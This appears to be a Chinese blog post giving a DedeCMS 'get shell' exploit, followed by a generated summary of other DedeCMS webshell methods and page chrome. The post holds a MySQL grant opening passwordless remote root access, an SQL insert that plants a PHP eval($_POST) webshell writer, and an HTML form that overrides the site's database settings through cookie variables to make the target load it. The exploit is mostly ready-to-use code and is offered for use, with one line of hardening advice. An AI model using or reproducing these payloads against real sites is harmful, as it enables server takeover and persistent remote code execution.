DEDECMS拿SHELL EXP

此漏洞的前提是必须知道后台或plus 目录存在,服务器能外连,就能拿shell
因此大家一定要养成使用DEDECM建站时改后台名字的习惯。


MYSQL开启外链语句:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '' WITH GRANT OPTION;

 

接下来:

前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?phpeval($_POST[c])?>\');echo "OK";@fclose($fp);{/dede:php}'); 
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究
 <form action="" method="post" name="QuickSearch" id="QuickSearch"onsubmit="addaction();">

<input type="text" value="http://www.laod.org/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />

<input type="text" value="dbhost"name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />

<input type="text"value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />

<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />

<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br/>

<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />

<input type="text" value="true" name="nocache" style="width:400">

<input type="submit"value="提交" name="QuickSearchBtn"><br /></form><script>function addaction(){document.QuickSearch.action=document.QuickSearch.doaction.value;}</script>

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DedeCMS是一款常见的内容管理系统,它也存在一些被黑客利用的漏洞来获取shell权限。其中,有一种常见的方法是通过在广告管理模块中的新建广告功能中插入恶意代码来实现。具体操作是在广告内容处写入恶意代码并提交,然后利用ad_add.php文件进行处理,从而获取shell权限。这是一种比较常见的方式,但需要注意的是,这种漏洞只会影响特定版本的DedeCMS,且需要具有管理员权限才能进行操作。 除了在广告管理模块中利用漏洞获取shell权限外,还有其他一些常见的方法,比如利用网站管理员的添加插件功能来上传包含恶意代码的插件文件,从而达到获取shell权限的目的。此外,还可以通过执行SQL语句写入webshell的方式,或者利用文件包含的漏洞进行攻击。总的来说,获取DedeCMSshell权限有多种方法,黑客们会根据具体情况选择最适合的方法进行攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Dedecms 5.7 SP2后台getshell](https://blog.csdn.net/he_and/article/details/80890664)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [apache的网站配置目录_网站后台getshell的方法总结](https://blog.csdn.net/weixin_39977776/article/details/110105614)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值